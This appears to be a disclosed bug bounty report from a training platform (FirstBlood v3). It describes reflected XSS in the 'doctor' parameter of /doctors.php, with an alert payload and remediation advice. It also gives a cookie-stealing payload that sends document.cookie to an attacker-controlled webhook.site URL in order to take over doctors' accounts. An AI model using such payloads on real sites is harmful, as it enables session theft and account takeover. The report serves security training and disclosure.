FirstBlood-#1127 — Reflected XSS
This issue was discovered on FirstBlood v3
On 2022-12-08, pichik Level 4 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
BugBountyHunter Membership
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Hello zseano,
hope you are doing well, thanks for the next event.
My first bug is reflected XSS in /doctors.php endpoint. There is parameter doctor which is reflected in between <script> tags.
Didnt find any better impact yet so reporting just simple alert.
We just need to escape ' and separate our code, so it wont throw error.
Here is payload with simple alert : ';alert(1);'
POC LINK:
POC SCREEN:
IMPACT
As I found a way in, Iam increasing impact for this bug as it can be used in a way as my #1335 report.
Attacker can use this bug to append cookies to url, send them to his server and steal accounts of doctors.
Payload:
doctor=%27;window.location.href=%27https://webhook.site/[attacker-id]?%27%2Bdocument.cookie;%27
ACCOUNT TAKEOVER POC LINK:
Remediation:
HTML Encoding user entered input should prevent XSS easily.
P3 Medium
Endpoint: /doctors.php
Parameter: doctor
Payload: ';alert(1);'
FirstBlood ID: 47
Vulnerability Type: Reflective XSS
The endpoint /doctors.php is vulnerable to reflective XSS via the ?doctor= parameter